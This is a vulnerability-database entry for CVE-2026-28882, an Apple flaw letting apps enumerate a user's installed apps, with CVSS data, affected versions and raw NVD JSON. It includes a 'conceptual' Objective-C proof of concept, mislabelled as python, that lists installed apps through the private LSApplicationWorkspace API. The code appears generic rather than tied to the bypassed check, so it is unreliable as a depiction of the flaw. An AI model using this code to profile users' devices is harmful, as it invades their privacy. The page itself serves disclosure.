Security Vulnerability Report
中文
CVE-2026-28882 CVSS 4.0 MEDIUM

CVE-2026-28882

Published: 2026-03-25 01:17:12
Last Modified: 2026-05-11 21:18:53
Source: [email protected]

Description

This issue was addressed with improved checks. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, tvOS 26.4, visionOS 26.4, watchOS 26.4. An app may be able to enumerate a user's installed apps.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
iOS < 18.7.9
iOS < 26.4
iPadOS < 18.7.9
iPadOS < 26.4
macOS Tahoe < 26.4
tvOS < 26.4
visionOS < 26.4
watchOS < 26.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Conceptual Proof of Concept (PoC) for CVE-2026-28882 * This snippet demonstrates how an app might enumerate installed apps * using private APIs if the security checks are bypassed. * WARNING: This is for educational purposes only. */ #import <Foundation/Foundation.h> @interface LSApplicationWorkspace : NSObject + (id)defaultWorkspace; - (NSArray *)allInstalledApplications; @end @interface LSApplicationProxy : NSObject @property (nonatomic, readonly) NSString *bundleIdentifier; @property (nonatomic, readonly) NSString *localizedName; @end int main(int argc, char * argv[]) { @autoreleasepool { // Access the private LSApplicationWorkspace class Class workspaceClass = NSClassFromString(@"LSApplicationWorkspace"); if (workspaceClass) { id workspace = [workspaceClass performSelector:@selector(defaultWorkspace)]; if (workspace) { // Retrieve the list of all installed applications NSArray *apps = [workspace performSelector:@selector(allInstalledApplications)]; NSLog(@"[PoC] Found %lu installed applications:", (unsigned long)apps.count); for (id app in apps) { NSString *bundleID = [app performSelector:@selector(bundleIdentifier)]; NSString *name = [app performSelector:@selector(localizedName)]; NSLog(@"App: %@ | Bundle ID: %@", name, bundleID); } } } else { NSLog(@"[PoC] Failed to access LSApplicationWorkspace."); } } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28882", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:12.057", "lastModified": "2026-05-11T21:18:52.537", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved checks. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, tvOS 26.4, visionOS 26.4, watchOS 26.4. An app may be able to enumerate a user's installed apps."}, {"lang": "es", "value": "Este problema se abordó con comprobaciones mejoradas. Este problema está solucionado en iOS 26.4 y iPadOS 26.4, macOS Tahoe 26.4, tvOS 26.4, visionOS 26.4, watchOS 26.4. Una aplicación podría ser capaz de enumerar las aplicaciones instaladas de un usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "F813DB63-2B55-4E0B-9073-5465C65F69D6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "01612D13-BE5B-43F8-B53E-5BF57F2A5B0C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "DCFD15D9-91CA-4342-9F7E-A219B459B755"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "A906E2B7-B83B-4AD0-B00F-BEDEF2EDB844"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "113B9705-BFF0-4357-B1AB-F57052F32361"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "F6EAF0A5-7CFF-4EF6-9BC7-DB25B213F753"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126792", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126797", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126798", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126799", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127111", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.